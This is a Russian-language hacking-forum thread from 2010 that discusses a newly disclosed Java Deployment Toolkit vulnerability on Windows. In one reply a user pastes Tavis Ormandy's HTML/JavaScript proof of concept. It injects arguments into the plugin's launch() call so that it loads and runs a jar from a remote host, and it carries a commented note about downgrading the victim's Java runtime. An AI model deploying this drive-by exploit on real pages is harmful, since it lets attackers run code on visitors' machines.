ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > ИНФО > Мировые новости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Программная “дыра” в Java делает пользователей Windows уязвимыми перед хакерами
  #1  
Старый 13.04.2010, 09:50
3d_max
Новичок
Регистрация: 01.02.2010
Сообщений: 15
Провел на форуме:
35437

Репутация: 5
Отправить сообщение для 3d_max с помощью ICQ
По умолчанию Программная “дыра” в Java делает пользователей Windows уязвимыми перед хакерами

Тревожные известия пришли для пользователей компьютеров под управлением операционной системы Windows. Сразу из двух источников появились сообщения об обнаружении в технологии Java новой уязвимости, которая может использоваться хакерами для атак на Windows PC. Причем, для осуществления такой атаки пользователям достаточно посетить веб-страницу с вредоносным кодом.

Специалист Google Тавис Орманди (Tavis Ormandy) и работник компании Wintercore Рубен Сантамарта (Ruben Santamarta) независимо друг от друга опубликовали в различных источниках подробности о данной уязвимости. По их словам, проблема связана с фреймворком Java Web Start, позволяющим разработчикам легко создавать Java приложения. При этом Тавис Орманди подчеркивает, что отключение данного Java плагина отнюдь не является панацеей от хакерских атак.

По данным специалистов, с помощью указанной уязвимости (которую, кстати, оказалось очень легко обнаружить) злоумышленник способен передавать произвольные параметры в утилиту и, в конечном счете, получать контроль над системой. В блоге Threat Post лаборатории Касперского говорится, что эта уязвимость может использоваться на всех актуальных версиях Windows, а также в популярных браузерах, включая Firefox, Internet Explorer и Chrome.

Тавис Орманди отмечает, что он проинформировал разработчиков технологии Java Web Start из Sun Microsystems об обнаруженной проблеме. Однако ему сообщили, что в компании не считают приоритет данной уязвимости достаточно высоким, чтобы выпустить патч для нее вне стандартного квартального цикла.

12.04.2010
Источник

Последний раз редактировалось Suicide; 13.04.2010 в 10:36..
 
Ответить с цитированием

  #2  
Старый 13.04.2010, 16:50
Dreak
Участник форума
Регистрация: 31.08.2009
Сообщений: 106
Провел на форуме:
179198

Репутация: 7
Отправить сообщение для Dreak с помощью ICQ
По умолчанию

О_о Ссылку на код в студию.
 
Ответить с цитированием

  #3  
Старый 13.04.2010, 16:52
BlackSite
Постоянный
Регистрация: 06.02.2009
Сообщений: 385
Провел на форуме:
2920922

Репутация: 230
Отправить сообщение для BlackSite с помощью ICQ
По умолчанию

Удалаю java к чертям )))
 
Ответить с цитированием

  #4  
Старый 13.04.2010, 17:33
mr.The
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,206
Провел на форуме:
4778940

Репутация: 1257


Отправить сообщение для mr.The с помощью ICQ
По умолчанию

Windows делает пользователей Windows уязвимыми перед хакерами
 
Ответить с цитированием

  #5  
Старый 13.04.2010, 17:54
3d_max
Новичок
Регистрация: 01.02.2010
Сообщений: 15
Провел на форуме:
35437

Репутация: 5
Отправить сообщение для 3d_max с помощью ICQ
По умолчанию

Ссылки на код нет
 
Ответить с цитированием

  #6  
Старый 13.04.2010, 18:00
.antibiotic.
[bald man]
Регистрация: 13.07.2009
Сообщений: 623
Провел на форуме:
4490909

Репутация: 1167


По умолчанию

повсюду одни дыры..
до этого новость была про 25 дыр.. в вин
 
Ответить с цитированием

  #7  
Старый 13.04.2010, 18:02
BrainDeaD
Постоянный
Регистрация: 09.06.2005
Сообщений: 531
Провел на форуме:
3516666

Репутация: 439


По умолчанию

Цитата:
Сообщение от mr.The  
Windows делает пользователей Windows уязвимыми перед хакерами
дырка в java, при чём тут windows?
 
Ответить с цитированием

  #8  
Старый 13.04.2010, 18:18
zlo12
Постоянный
Регистрация: 28.12.2007
Сообщений: 328
Провел на форуме:
3054717

Репутация: 170
Отправить сообщение для zlo12 с помощью ICQ
По умолчанию

А они опубликуют место с дырочкой или так, попугать решили?
 
Ответить с цитированием

  #9  
Старый 13.04.2010, 18:23
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию

Цитата:
Сообщение от zlo12  
А они опубликуют место с дырочкой или так, попугать решили?
http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemi d=1

Код HTML:
<html>
<head><title>Java Deployment Toolkit Test Page</title></head>
<body>
    <script>
        // Tavis Ormandy <taviso@sdf.lonestar.org>, April 2010

        var u = "http: -J-jar -J\\\\lock.cmpxchg8b.com\\calc.jar none";

        if (window.navigator.appName == "Microsoft Internet Explorer") {
            var o = document.createElement("OBJECT");

            o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";

            // Trigger the bug
            o.launch(u);
        } else {
            // Mozilla
            var o = document.createElement("OBJECT");
            var n = document.createElement("OBJECT");

            o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
            n.type = "application/java-deployment-toolkit";
            document.body.appendChild(o);
            document.body.appendChild(n);

            // Test both MIME types
            try {
                // Old type
                o.launch(u);
            } catch (e) {
                // New type
                n.launch(u);
            }
        }

        // Bonus Vulnerability, why not downgrade victim to a JRE vulnerable to
        // this classic exploit?
        // http://sunsolve.sun.com/search/document.do?assetkey=1-66-244991-1

        // o.installJRE("1.4.2_18");
    </script>
</body>
</html>

Последний раз редактировалось BlackSun; 13.04.2010 в 18:26..
 
Ответить с цитированием

  #10  
Старый 13.04.2010, 18:55
NewCapital
Постоянный
Регистрация: 01.11.2009
Сообщений: 525
Провел на форуме:
1063460

Репутация: 75


По умолчанию

Цитата:
Сообщение от .antibiotic.  
повсюду одни дыры..
до этого новость была про 25 дыр.. в вин
вдуватели и сюда добрались
лиж бы дыру найти
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Lenta.ru протестировала Windows Vista Utochka Мировые новости 1 15.06.2006 18:03
Windows Vista - "Новые возможности" от Microsoft Hitman_2 Мировые новости 0 28.03.2006 01:31
Словарь Java-терминов foreva Чужие Статьи 0 08.02.2005 16:28



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ